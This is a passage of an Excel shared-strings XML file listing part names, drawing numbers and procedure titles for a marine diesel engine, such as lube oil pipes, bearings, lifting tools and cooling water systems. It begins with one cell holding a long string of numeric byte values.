    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>CABLE, MULTICORE, TWISTED PAIR</t>
  </si>
  <si>
    <t>EN700AF0107.0</t>
  </si>
  <si>
    <t>INSULATION RESISTANCE MONITOR</t>
  </si>
  <si>
    <t>HEXAL.SOCKET PAN HEAD SCREWS,4.8</t>
  </si>
  <si>
    <t>EN59E03006.0</t>
  </si>
  <si>
    <t>INSULATION, MATTRESS OR ROLL</t>
  </si>
  <si>
    <t>ME-ECS, PC RECOVERY TOOL IMAGE</t>
  </si>
  <si>
    <t>KEYBOARD WITH POINTER DEVICE</t>
  </si>
  <si>
    <t>CABLE CONDUIT, HALOGENFREE</t>
  </si>
  <si>
    <t>EN710BC80401480.0</t>
  </si>
  <si>
    <t>SAFETY SIGNS AND THEIR USE</t>
  </si>
  <si>
    <t>EN690A30121000.0</t>
  </si>
  <si>
    <t>5593866-2.1</t>
  </si>
  <si>
    <t>TERMINAL BOX, ACCESSORIES</t>
  </si>
  <si>
    <t>1142191-3.0</t>
  </si>
  <si>
    <t>ARRANGEMENT OF DISCS</t>
  </si>
  <si>
    <t>5149894-6.6</t>
  </si>
  <si>
    <t>5248359-0.0</t>
  </si>
  <si>
    <t>LUB. &amp;amp; COOL. OIL PIPES</t>
  </si>
  <si>
    <t>MAIN &amp;amp; CAM LUB.OIL SYSTEM</t>
  </si>
  <si>
    <t>PR LASER&amp;amp;PIANOWIRE ALIGN</t>
  </si>
  <si>
    <t>PIPES CLEAN. &amp;amp; TREATMENT</t>
  </si>
  <si>
    <t>PR CABLING &amp;amp; CONNECTIONS</t>
  </si>
  <si>
    <t>QUAY TRIAL &amp;amp; SEA TRIAL</t>
  </si>
  <si>
    <t>SHOP &amp;amp; SEA TRIAL GI</t>
  </si>
  <si>
    <t>5736148-2.0</t>
  </si>
  <si>
    <t>PS CABLING &amp;amp; CONNECTIONS</t>
  </si>
  <si>
    <t>TOP CLEARANCE MAIN BEARING</t>
  </si>
  <si>
    <t>5364736-6.11</t>
  </si>
  <si>
    <t>PACKING-SILICONE PASTE ADH./SEAL</t>
  </si>
  <si>
    <t>LUB. OIL PIPE-MAIN BEARING</t>
  </si>
  <si>
    <t>COATING PROCESS (ACCOLAN LB)</t>
  </si>
  <si>
    <t>1072-0100 CRANKCASE RELIEF VALVE</t>
  </si>
  <si>
    <t>DOWEL PIN, W. INTERNAL THREAD</t>
  </si>
  <si>
    <t>CAPS, WITH CERTIFICATE</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING, UPPER</t>
  </si>
  <si>
    <t>QS CRANKSHAFT &amp;amp; FLANGE</t>
  </si>
  <si>
    <t>Incomplete_Part</t>
  </si>
  <si>
    <t>WHITE METAL GUIDE SHOE/GUIDE PLA</t>
  </si>
  <si>
    <t>BEARING MAKERS (WHITE METAL)</t>
  </si>
  <si>
    <t>PR HYDRAULIC HOSE &amp;amp; PIPE</t>
  </si>
  <si>
    <t>COOLING JACKET, CYLINDER COVER</t>
  </si>
  <si>
    <t>5079803-5.5</t>
  </si>
  <si>
    <t>2272-0220 EXH. VALVE, DETAIL</t>
  </si>
  <si>
    <t>RETAINING RING, SHAFT/BORE</t>
  </si>
  <si>
    <t>ORIFICE PLUG, EXTERNAL THREAD</t>
  </si>
  <si>
    <t>ARR. OF JUNCTION BOX &amp;amp; CABLEWAY</t>
  </si>
  <si>
    <t>5246820-3.0</t>
  </si>
  <si>
    <t>QC FUEL PLUNGER &amp;amp; BARREL</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 150-200</t>
  </si>
  <si>
    <t>5081092-4.0</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 100-150</t>
  </si>
  <si>
    <t>5081097-3.0</t>
  </si>
  <si>
    <t>EN160D0114045.0</t>
  </si>
  <si>
    <t>LUB. OIL PIPE-TURBOCHARGER</t>
  </si>
  <si>
    <t>5670528-6.1</t>
  </si>
  <si>
    <t>EN362FB0077.0</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 50-100</t>
  </si>
  <si>
    <t>5670534-5.0</t>
  </si>
  <si>
    <t>BLIND FLANGES PN 16 / PN 40</t>
  </si>
  <si>
    <t>EN362HB0077.0</t>
  </si>
  <si>
    <t>PIPE BENDS, X DEG. W.CERTIFICATE</t>
  </si>
  <si>
    <t>4272-0040 FUEL OIL SY. DRAIN BOX</t>
  </si>
  <si>
    <t>CAM LOCK WASHERS, STAINLESS</t>
  </si>
  <si>
    <t>EN64AD12.0</t>
  </si>
  <si>
    <t>QS HEAT INS.&amp;amp;NOISE ABATEM</t>
  </si>
  <si>
    <t>SQUARE STEEL BARS, STAINLESS</t>
  </si>
  <si>
    <t>RHS STEEL PIPES RECT. STAINLESS</t>
  </si>
  <si>
    <t>HEX. HEAD SCREW, ACID-RES</t>
  </si>
  <si>
    <t>RHS STEEL PIPES, SQUARE</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. &amp;gt;450</t>
  </si>
  <si>
    <t>PACKING MATERIAL, SECTIONAL</t>
  </si>
  <si>
    <t>EQUAL CROSS COUPLINGS</t>
  </si>
  <si>
    <t>PISTON AND PISTON ROD PANEL</t>
  </si>
  <si>
    <t>LIFTING TOOL FOR PISTON ROD FOOT</t>
  </si>
  <si>
    <t>COVER FOR STUFFING BOX HOLE</t>
  </si>
  <si>
    <t>PRESSURE TESTING TOOL, PISTON</t>
  </si>
  <si>
    <t>5093924-5.1</t>
  </si>
  <si>
    <t>WORKTABLE, STUFFING BOX</t>
  </si>
  <si>
    <t>5095950-6.1</t>
  </si>
  <si>
    <t>PISTON AND ROD,SUPPORT TOOL</t>
  </si>
  <si>
    <t>5090549-1.0</t>
  </si>
  <si>
    <t>4570-0540 EQUIP.TEST ACCUMULATOR</t>
  </si>
  <si>
    <t>3128632-8.0</t>
  </si>
  <si>
    <t>TS CROSSBAR FOR CYLINDERLINER</t>
  </si>
  <si>
    <t>TS LIFTING TOOL, CYLINDERLINER</t>
  </si>
  <si>
    <t>5197572-2.2</t>
  </si>
  <si>
    <t>TS LIFTING TOOL, PISTON ROD FOOT</t>
  </si>
  <si>
    <t>5197577-1.3</t>
  </si>
  <si>
    <t>WAVE CUT MACHINE, OPTIONAL</t>
  </si>
  <si>
    <t>5184821-8</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>FITTED BOLT, WITH TOOL THREAD</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>3171276-5.4</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0792729-9.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0742882-1.8</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0742968-5.8</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0743196-1.4</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>1234329-2.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5313646-4.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>1175959-0.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5123289-1.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5085903-6.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN150AR0042.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5566975-5.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0743165-0.2</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5145853-0.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>3164796-5.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0743480-0.2</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5077849-2.2</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5064259-9.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5037168-0.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0743176-9.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN160D0114045</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>WELD-ON FLANGES PN 16 / PN 40</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN160E0076045.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>WELDING NECK FLANGES, W. CERTIF.</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0997371-2.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN43DE00250600.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN61DP1070.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN43RF50241006.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN43RK14100608.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5073078-8.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN9H10.1.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5611577-9.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5094371-3.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5094426-6.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5197569-9.2</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5653868-4.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>WEAR RIDGE MILL. MACH., OPTIONAL</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0570-0100 SAFETY EQUIPMENT</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5758677-3.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5369273-1.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5384011-3.2</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN14AP0.001.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN362NA0061.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0743175-7.10</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>1153831-1.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN518KA0042.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ANCHOR SHACKLES W.SCREW PIN</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>INSPECTION OF WELDED COMPONENTS</t>
  </si>
  <si>
    <t>PR BEARING &amp;quot;HOYT&amp;quot; CLORIDE</t>
  </si>
  <si>
    <t>0743230-8.3</t>
  </si>
  <si>
    <t>PR FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>0742088-9.3</t>
  </si>
  <si>
    <t>QC TURNING GEAR, FIRST TIME APPR</t>
  </si>
  <si>
    <t>CHECK ALIGNMENT OF CHAIN WHEEL</t>
  </si>
  <si>
    <t>0743634-7.2</t>
  </si>
  <si>
    <t>PR GUIDANCE FOR INSPEC. OF COMP.</t>
  </si>
  <si>
    <t>PR WELDING OF STAINLESS STEEL</t>
  </si>
  <si>
    <t>0743612-0.12</t>
  </si>
  <si>
    <t>QC LIFTING TOOL, FIRST TIME APPR</t>
  </si>
  <si>
    <t>0743672-9.8</t>
  </si>
  <si>
    <t>SAFETY REGULATION, DOCUMENTATION</t>
  </si>
  <si>
    <t>QC, STEAM RESISTANT O RINGS</t>
  </si>
  <si>
    <t>0743690-8.0</t>
  </si>
  <si>
    <t>QS, O-RING, PRODUCTION/STORAGE</t>
  </si>
  <si>
    <t>0743829-0.1</t>
  </si>
  <si>
    <t>0743596-3.0</t>
  </si>
  <si>
    <t>0743700-6.2</t>
  </si>
  <si>
    <t>IMPROVED QUALITY OF WELDED PARTS</t>
  </si>
  <si>
    <t>0743777-3.0</t>
  </si>
  <si>
    <t>0743703-1.1</t>
  </si>
  <si>
    <t>PR FOUNDRY FEEDBACK</t>
  </si>
  <si>
    <t>0743826-5.0</t>
  </si>
  <si>
    <t>INSULATION OF EXH. GAS RECEIVER</t>
  </si>
  <si>
    <t>0743848-1.0</t>
  </si>
  <si>
    <t>0743909-3.0</t>
  </si>
  <si>
    <t>LOW PRESSURE SCR SYSTEM</t>
  </si>
  <si>
    <t>0743911-5.0</t>
  </si>
  <si>
    <t>0743921-1.1</t>
  </si>
  <si>
    <t>0743934-3.0</t>
  </si>
  <si>
    <t>WELDED ON WHITE METAL</t>
  </si>
  <si>
    <t>0743936-7.0</t>
  </si>
  <si>
    <t>TIER III VALVE</t>
  </si>
  <si>
    <t>0743965-4.0</t>
  </si>
  <si>
    <t>QS HCU CLEAN &amp;amp; INSPECTION</t>
  </si>
  <si>
    <t>ME FILTER, FIRST TIME APPROVAL</t>
  </si>
  <si>
    <t>QS HYDR. PUMP, HAND OPERATED</t>
  </si>
  <si>
    <t>0743659-9.0</t>
  </si>
  <si>
    <t>0743945-1.0</t>
  </si>
  <si>
    <t>CABLE, MULTICORE, W. CERTIFICATE</t>
  </si>
  <si>
    <t>2272-0500-0008.0</t>
  </si>
  <si>
    <t>FUEL PUMP, ACTUATOR</t>
  </si>
  <si>
    <t>5266042-3.1</t>
  </si>
  <si>
    <t>FUEL &amp;amp; EXHAUST GEAR, MISC. PARTS</t>
  </si>
  <si>
    <t>5257993-7.2</t>
  </si>
  <si>
    <t>MAIN LUB OIL FILTER</t>
  </si>
  <si>
    <t>5254274-4.1</t>
  </si>
  <si>
    <t>PISTON &amp;amp; ROD, TOOLS</t>
  </si>
  <si>
    <t>P90261-0107.0</t>
  </si>
  <si>
    <t>5740081-6.2</t>
  </si>
  <si>
    <t>6670-0100-0003.0</t>
  </si>
  <si>
    <t>TS LIFTING ATTACHM, AIR COOLER</t>
  </si>
  <si>
    <t>5197731-6.2</t>
  </si>
  <si>
    <t>5470-0110 SCAV. AIR COOLER TOOLS</t>
  </si>
  <si>
    <t>5470-0110-0001.0</t>
  </si>
  <si>
    <t>5470-0120 S. A. C. LIFTING TOOS</t>
  </si>
  <si>
    <t>5470-0120-0001.0</t>
  </si>
  <si>
    <t>7670-0310 TRAVELLING TROLLEY</t>
  </si>
  <si>
    <t>7670-0310-0001.0</t>
  </si>
  <si>
    <t>LP-SCR SYSTEM</t>
  </si>
  <si>
    <t>B35Z0009-200</t>
  </si>
  <si>
    <t>PR OIL THROW RING, MOUNTING OF</t>
  </si>
  <si>
    <t>0743760-4.1</t>
  </si>
  <si>
    <t>PS, TOP CLEARANCE MAIN BEARING</t>
  </si>
  <si>
    <t>0743881-4.0</t>
  </si>
  <si>
    <t>NUT, ROUND W. TOMMY BAR HOLES</t>
  </si>
  <si>
    <t>0788051-9.1</t>
  </si>
  <si>
    <t>DocItem med Excel</t>
  </si>
  <si>
    <t>0742883-3.9</t>
  </si>
  <si>
    <t>COATING PROCES (DLA 01) DAIDO</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING, COMPLETE</t>
  </si>
  <si>
    <t>5126118-3.4</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING, LOWER</t>
  </si>
  <si>
    <t>5126119-5.1</t>
  </si>
  <si>
    <t>LUBRICATING AND COOLING OIL FLOW</t>
  </si>
  <si>
    <t>P90403-0012.0</t>
  </si>
  <si>
    <t>CONN. ROD, COMPRESSION SHIM</t>
  </si>
  <si>
    <t>P90405-0002.0</t>
  </si>
  <si>
    <t>CYL. LINER AND COOL. JACKET</t>
  </si>
  <si>
    <t>P90302-0217.0</t>
  </si>
  <si>
    <t>Dowel pin, w. external thread</t>
  </si>
  <si>
    <t>1472-1420 CAMSHAFT DRV. GUIDEBAR</t>
  </si>
  <si>
    <t>EN47AA10.0</t>
  </si>
  <si>
    <t>PISTON, STEP 2 OIL CYLINDER</t>
  </si>
  <si>
    <t>ADAPTER, STRAIGHT, MALE/MALE</t>
  </si>
  <si>
    <t>5159514-2.0</t>
  </si>
  <si>
    <t>RUBBER COMPENSATOR, FLUID TYPE</t>
  </si>
  <si>
    <t>4572-0900 HYDRAULIC HIGH-PRESSUR</t>
  </si>
  <si>
    <t>4572-0900-0009.0</t>
  </si>
  <si>
    <t>PMI SOFTWARE PACKAGE</t>
  </si>
  <si>
    <t>5778252-7.0</t>
  </si>
  <si>
    <t>PMI Configuration File</t>
  </si>
  <si>
    <t>5778251-5.0</t>
  </si>
  <si>
    <t>PMI LICENSE KEY</t>
  </si>
  <si>
    <t>5356197-9.1</t>
  </si>
  <si>
    <t>BALL VALVE, FLANGE CONNECTION</t>
  </si>
  <si>
    <t>1097033-1.0</t>
  </si>
  <si>
    <t>PILOT AIR PIPE</t>
  </si>
  <si>
    <t>5418796-7.1</t>
  </si>
  <si>
    <t>PACKING-SILICONE PASTE SEAL.MATR</t>
  </si>
  <si>
    <t>EN14AM0.310.0</t>
  </si>
  <si>
    <t>5089354-5.1</t>
  </si>
  <si>
    <t>STANCHION WITH BASE, COMPLETE</t>
  </si>
  <si>
    <t>EN141RD1.0</t>
  </si>
  <si>
    <t>AO DO Board 0360 PCBA</t>
  </si>
  <si>
    <t>1142739-2.2</t>
  </si>
  <si>
    <t>5710772-9</t>
  </si>
  <si>
    <t>5710772-9.1</t>
  </si>
  <si>
    <t>ACCELERATION VALVE CONTROL</t>
  </si>
  <si>
    <t>ROUND STEEL BARS, STAINLESS</t>
  </si>
  <si>
    <t>Label, Graphics File</t>
  </si>
  <si>
    <t>1142112-4.1</t>
  </si>
  <si>
    <t>TS LIFTING CHAINS CYL.COVER</t>
  </si>
  <si>
    <t>5197533-9.1</t>
  </si>
  <si>
    <t>TS LIFT. TOOL, CYLINDER COVER</t>
  </si>
  <si>
    <t>5284058-9.1</t>
  </si>
  <si>
    <t>2270-0350 CYL. COVER LIFTING TOO</t>
  </si>
  <si>
    <t>1470-0300 CONROD &amp;amp; CROSSH TOOL P</t>
  </si>
  <si>
    <t>TS BRACKET, SUPPORT OF CROSSHEAD</t>
  </si>
  <si>
    <t>5197625-1.2</t>
  </si>
  <si>
    <t>TS CHAIN, SUSPENDING PISTON</t>
  </si>
  <si>
    <t>5197633-4.2</t>
  </si>
  <si>
    <t>TS LIFT. ATTACHM, CONNECTING ROD</t>
  </si>
  <si>
    <t>5197634-6.3</t>
  </si>
  <si>
    <t>TS LIFTING TOOL, CROSSHEAD</t>
  </si>
  <si>
    <t>5197644-2.2</t>
  </si>
  <si>
    <t>TS SLING, CR.HEAD BEARING CAP</t>
  </si>
  <si>
    <t>5202655-8.2</t>
  </si>
  <si>
    <t>7670-0230 COMBINATION SPANNER</t>
  </si>
  <si>
    <t>7670-0250 MISCELLANEOUS SPANNERS</t>
  </si>
  <si>
    <t>7670-0250-0007.0</t>
  </si>
  <si>
    <t>HEXALOBULAR EXTERNAL KEY SET</t>
  </si>
  <si>
    <t>EN548B1.0</t>
  </si>
  <si>
    <t>BIT,HEXAGON SOCKET SCREWS, SET</t>
  </si>
  <si>
    <t>7670-0260 OPEN-ENDED SPANNERS</t>
  </si>
  <si>
    <t>CHAFING DEVICE FOR ROUNDSLINGS</t>
  </si>
  <si>
    <t>5224266-0.0</t>
  </si>
  <si>
    <t>SUPPORT FOR HYDRAULIC JACK</t>
  </si>
  <si>
    <t>5094557-2.0</t>
  </si>
  <si>
    <t>HYDR.TOOL - HOLDING-DOWN BOLTS</t>
  </si>
  <si>
    <t>P91265-0012.0</t>
  </si>
  <si>
    <t>HYDRAULIC TOOL - END CHOCK BOLTS</t>
  </si>
  <si>
    <t>P91266-0019.0</t>
  </si>
  <si>
    <t>3065-0151 LUBRICATING OIL</t>
  </si>
  <si>
    <t>3065-0151-0001.0</t>
  </si>
  <si>
    <t>3065-0150 LUBRICATING OIL</t>
  </si>
  <si>
    <t>3065-0150-0001.0</t>
  </si>
  <si>
    <t>4565-0611 EXH.V ACT. TIM. UNIT</t>
  </si>
  <si>
    <t>4565-0611-0001.0</t>
  </si>
  <si>
    <t>4565-0610 EXH.V TIM. UNIT DATA</t>
  </si>
  <si>
    <t>4565-0610-0001.1</t>
  </si>
  <si>
    <t xml:space="preserve"> WATER MIST CATCHER</t>
  </si>
  <si>
    <t>5465-0201-0001.0</t>
  </si>
  <si>
    <t>5065-0200 COOLING WATER</t>
  </si>
  <si>
    <t>5065-0200-0001.0</t>
  </si>
  <si>
    <t>5065-0201 COOLING WATER</t>
  </si>
  <si>
    <t>5065-0201-0001.0</t>
  </si>
  <si>
    <t>7065-1200 PICK-UP ARRANGEMENT</t>
  </si>
  <si>
    <t>7065-1200-0001.0</t>
  </si>
  <si>
    <t>7665-0501 SCREWS &amp;amp; NUTS</t>
  </si>
  <si>
    <t>7665-0501-0001.0</t>
  </si>
  <si>
    <t>DESCRIPTION&amp;amp;MAINTENANCE SCHEDULE</t>
  </si>
  <si>
    <t>5568918-1.2</t>
  </si>
  <si>
    <t>DISCLAIMER</t>
  </si>
  <si>
    <t>0205-0100-0002.0</t>
  </si>
  <si>
    <t>SAFETY PRECAUTI. HYDRAULIC TOOLS</t>
  </si>
  <si>
    <t>0545-0110-0001.0</t>
  </si>
  <si>
    <t>0745-0100 GENERAL DESCRIPTION</t>
  </si>
  <si>
    <t>0745-0100-0002.0</t>
  </si>
  <si>
    <t>1040-0100 STRUCTURAL PARTS</t>
  </si>
  <si>
    <t>1040-0100-0002.0</t>
  </si>
  <si>
    <t>1440-0100 DRIVING GEAR</t>
  </si>
  <si>
    <t>1440-0100-0001.1</t>
  </si>
  <si>
    <t>1840-0100 VIBRATION CONTROL</t>
  </si>
  <si>
    <t>1840-0100-0001.2</t>
  </si>
  <si>
    <t>2240-0100-0003.0</t>
  </si>
  <si>
    <t>2255-0145 OVERVIEW OF PISTON RIN</t>
  </si>
  <si>
    <t>2255-0145-0001.0</t>
  </si>
  <si>
    <t>2255-0150 LINER CONDITION</t>
  </si>
  <si>
    <t>2255-0150-0001.0</t>
  </si>
  <si>
    <t>2540-0100 BEARINGS</t>
  </si>
  <si>
    <t>2540-0100-0001.1</t>
  </si>
  <si>
    <t>3040-0100 LUBRICATING OIL SYSTEM</t>
  </si>
  <si>
    <t>3040-0100-0001.1</t>
  </si>
  <si>
    <t>3440-0100 COMPRESSED AIR SYSTEM</t>
  </si>
  <si>
    <t>3440-0100-0001.2</t>
  </si>
  <si>
    <t>4240-0100-0001.1</t>
  </si>
  <si>
    <t>4245-0100-0003.1</t>
  </si>
  <si>
    <t>4540-0100-0003.0</t>
  </si>
  <si>
    <t>4545-0610 EXH.V ACT. TIM. UNIT</t>
  </si>
  <si>
    <t>4545-0610-0002.0</t>
  </si>
  <si>
    <t>LEAK DETECTION BORES HCU BLOCK</t>
  </si>
  <si>
    <t>4555-0160-0003.0</t>
  </si>
  <si>
    <t>4555-0165 LEVEL SWITCH CYL LUB</t>
  </si>
  <si>
    <t>4555-0165-0002.0</t>
  </si>
  <si>
    <t>4555-0171-0002.0</t>
  </si>
  <si>
    <t>5040-0100-0001.1</t>
  </si>
  <si>
    <t>5055-0120-0002.0</t>
  </si>
  <si>
    <t>5055-0130-0001.0</t>
  </si>
  <si>
    <t>5055-0140-0001.0</t>
  </si>
  <si>
    <t>5440-0100 GAS AND AIR SYSTEM</t>
  </si>
  <si>
    <t>5440-0100-0001.1</t>
  </si>
  <si>
    <t>6355-0145 SYNOPS.DIAG.AIRCOOLER</t>
  </si>
  <si>
    <t>6355-0145-0002.0</t>
  </si>
  <si>
    <t>6640-0100-0002.1</t>
  </si>
  <si>
    <t>6645-0170-0001.0</t>
  </si>
  <si>
    <t>5680371-8.1</t>
  </si>
  <si>
    <t>6655-0135-0009.0</t>
  </si>
  <si>
    <t>7045-0300-0002.0</t>
  </si>
  <si>
    <t>7040-0100-0001.1</t>
  </si>
  <si>
    <t>7645-0100-0001.0</t>
  </si>
  <si>
    <t>8540-0100-0002.1</t>
  </si>
  <si>
    <t>SUPERVISION, FOREIGN LOD UTILISA</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>MANUFACTURING, HP OIL PIPE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>QC PISTON RINGS W. CEM-1 CERMET</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>PR CYLINDER LINER - STRONG BACK</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>COMPENDIUM</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>2240-0100 CYLINDER UNIT</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>QS ACCUMULATOR AND DISTRIBUTOR</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SHOE FORE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>4240-0100 FUEL SYSTEM</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>4245-0100 FUEL SPECIFICATION</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>4540-0100 HYDRAULICS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>4555-0171 PIPING</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5040-0100 COOLING WATER SYSTEM</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5055-0120 LDCL COOLING WATER SYS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5055-0130 LDHT COOLING WATER SYS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5055-0140 JBB COOLING WATER SYST</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>6640-0100 OPERATION</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>7040-0100 CONTROL SYSTEM</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>7645-0100 HYDRAULIC TOOLS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>8540-0100 DELIVERY</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>7045-0300 MANOEUVRING SYSTEM</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EGR BLOWER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EGR COOLER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL BUSHING</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>PR HARD CHROME PLATED HOLES</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>QS NDT WELDED BEARING SHELL</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>3D MEASUREMENT OF BEARING SHELL</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>2272-0500 - PISTON ROD STUFF.BOX</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>2270-0248 PISTON LIFTING TOOLS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>HONING MACHINE, OPTIONAL</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
